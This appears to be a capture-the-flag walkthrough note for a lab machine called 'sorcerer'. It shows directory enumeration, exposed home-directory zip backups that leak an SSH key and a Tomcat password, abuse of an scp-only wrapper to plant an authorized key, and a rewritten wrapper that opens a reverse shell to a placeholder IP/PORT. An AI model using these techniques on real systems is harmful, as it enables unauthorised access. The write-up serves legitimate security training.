4 :7742

http://192.168.197.100:7742/
Control Panel Log in page.

$ gobuster dir -u http://192.168.197.100:7742 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/default              (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/default/]
/index.html           (Status: 200) [Size: 1219]
/zipfiles             (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/zipfiles/]

http://192.168.197.100:7742/default/
Page loaded with message: 404 Not Found 
# could be same as :80 landing page

http://192.168.197.100:7742/zipfiles/
Index of /zipfiles/
../
francis.zip                                        24-Sep-2020 19:27                2834
max.zip                                            24-Sep-2020 19:27                8274
miriam.zip                                         24-Sep-2020 19:27                2826
sofia.zip                                          24-Sep-2020 19:27                2818

# all others are basically empty /home/<user> dirs
$ unzip max.zip
Archive:  max.zip
   creating: home/max/
  inflating: home/max/.bash_logout
  inflating: home/max/.profile
   creating: home/max/.ssh/
  inflating: home/max/.ssh/id_rsa.pub
  inflating: home/max/.ssh/authorized_keys
  inflating: home/max/.ssh/id_rsa
  inflating: home/max/tomcat-users.xml.bak
  inflating: home/max/.bashrc
  inflating: home/max/scp_wrapper.sh

# exploring max.zip
$ cat tomcat-users.xml.bak
<role rolename="manager-gui"/>
<user username="tomcat" password="VTUD2XxJjf5LPmu6" roles="manager-gui"/>

$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
 'scp'*)
    $SSH_ORIGINAL_COMMAND
    ;;
 *)
    echo "ACCESS DENIED."
    scp
    ;;
esac

$ ssh -i id_rsa max@192.168.197.100
The authenticity of host '192.168.197.100 (192.168.197.100)' can't be established.
ECDSA key fingerprint is SHA256:1PY83TEUQqDNgXXB6iOOdqU+i3fBhc1zk4eg8yQyiXQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.197.100' (ECDSA) to the list of known hosts.
PTY allocation request failed on channel 0
ACCESS DENIED.
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
           [-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Connection to 192.168.197.100 closed.

# basically ssh command calls scp
# scp actually uses ssh to transfer files over
# maybe we need to use scp to run it

$ scp -i id_rsa web.php max@192.168.197.100:/var/www/html
scp: /var/www/html/web.php: Permission denied
# not writable maybe?

$ scp -i id_rsa web.php max@192.168.197.100:/tmp
web.php								100% 7205    94.7KB/s   00:00
# success

# as we cannot write in /var/www/html - can't use shell
# lets just put .ssh key in /home/max/.ssh/

# generate ssh key
# use max id_rsa to transfer custom id_rsa.pub to /home/max/.ssh/
$ scp -i id_rsa ../../../id_rsa.pub max@192.168.197.100:/home/max/.ssh/authorized_keys
id_rsa.pub

# connect using custom id_rsa
$ ssh -i ../../../id_rsa max@192.168.197.100
max@sorcerer:~$ whoami;id;hostname;uname -a
max
uid=1003(max) gid=1003(max) groups=1003(max)
sorcerer
Linux sorcerer 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux

Alternate Method

$ cat home/max/.ssh/authorized_keys
no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer

# command is being run
so we can overwrite the file, as we have existing copy from max.zip
and use scp to put a modified copy and then either allow ssh or call a bash shell back

#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
 'scp'*)
    $SSH_ORIGINAL_COMMAND
    ;;
 *)
    echo "ACCESS DENIED."
    bash -i >& /dev/tcp/IP/PORT 0>&1
    ;;
esac

Previous5 box enum max Next3 :8080 tomcat 7

Last updated 3 years ago

http://192.168.197.100:7742/ Control Panel Log in page. $ gobuster dir -u http://192.168.197.100:7742 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80 =============================================================== /default (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/default/] /index.html (Status: 200) [Size: 1219] /zipfiles (Status: 301) [Size: 178] [--> http://192.168.197.100:7742/zipfiles/] http://192.168.197.100:7742/default/ Page loaded with message: 404 Not Found # could be same as :80 landing page http://192.168.197.100:7742/zipfiles/ Index of /zipfiles/ ../ francis.zip 24-Sep-2020 19:27 2834 max.zip 24-Sep-2020 19:27 8274 miriam.zip 24-Sep-2020 19:27 2826 sofia.zip 24-Sep-2020 19:27 2818 # all others are basically empty /home/<user> dirs $ unzip max.zip Archive: max.zip creating: home/max/ inflating: home/max/.bash_logout inflating: home/max/.profile creating: home/max/.ssh/ inflating: home/max/.ssh/id_rsa.pub inflating: home/max/.ssh/authorized_keys inflating: home/max/.ssh/id_rsa inflating: home/max/tomcat-users.xml.bak inflating: home/max/.bashrc inflating: home/max/scp_wrapper.sh # exploring max.zip $ cat tomcat-users.xml.bak <role rolename="manager-gui"/> <user username="tomcat" password="VTUD2XxJjf5LPmu6" roles="manager-gui"/> $ cat scp_wrapper.sh #!/bin/bash case $SSH_ORIGINAL_COMMAND in 'scp'*) $SSH_ORIGINAL_COMMAND ;; *) echo "ACCESS DENIED." scp ;; esac $ ssh -i id_rsa max@192.168.197.100 The authenticity of host '192.168.197.100 (192.168.197.100)' can't be established. ECDSA key fingerprint is SHA256:1PY83TEUQqDNgXXB6iOOdqU+i3fBhc1zk4eg8yQyiXQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.197.100' (ECDSA) to the list of known hosts. PTY allocation request failed on channel 0 ACCESS DENIED. usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file] [-l limit] [-o ssh_option] [-P port] [-S program] source ... target Connection to 192.168.197.100 closed. # basically ssh command calls scp # scp actually uses ssh to transfer files over # maybe we need to use scp to run it $ scp -i id_rsa web.php max@192.168.197.100:/var/www/html scp: /var/www/html/web.php: Permission denied # not writable maybe? $ scp -i id_rsa web.php max@192.168.197.100:/tmp web.php 100% 7205 94.7KB/s 00:00 # success # as we cannot write in /var/www/html - can't use shell # lets just put .ssh key in /home/max/.ssh/ # generate ssh key # use max id_rsa to transfer custom id_rsa.pub to /home/max/.ssh/ $ scp -i id_rsa ../../../id_rsa.pub max@192.168.197.100:/home/max/.ssh/authorized_keys id_rsa.pub # connect using custom id_rsa $ ssh -i ../../../id_rsa max@192.168.197.100 max@sorcerer:~$ whoami;id;hostname;uname -a max uid=1003(max) gid=1003(max) groups=1003(max) sorcerer Linux sorcerer 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux

$ cat home/max/.ssh/authorized_keys no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer # command is being run so we can overwrite the file, as we have existing copy from max.zip and use scp to put a modified copy and then either allow ssh or call a bash shell back #!/bin/bash case $SSH_ORIGINAL_COMMAND in 'scp'*) $SSH_ORIGINAL_COMMAND ;; *) echo "ACCESS DENIED." bash -i >& /dev/tcp/IP/PORT 0>&1 ;; esac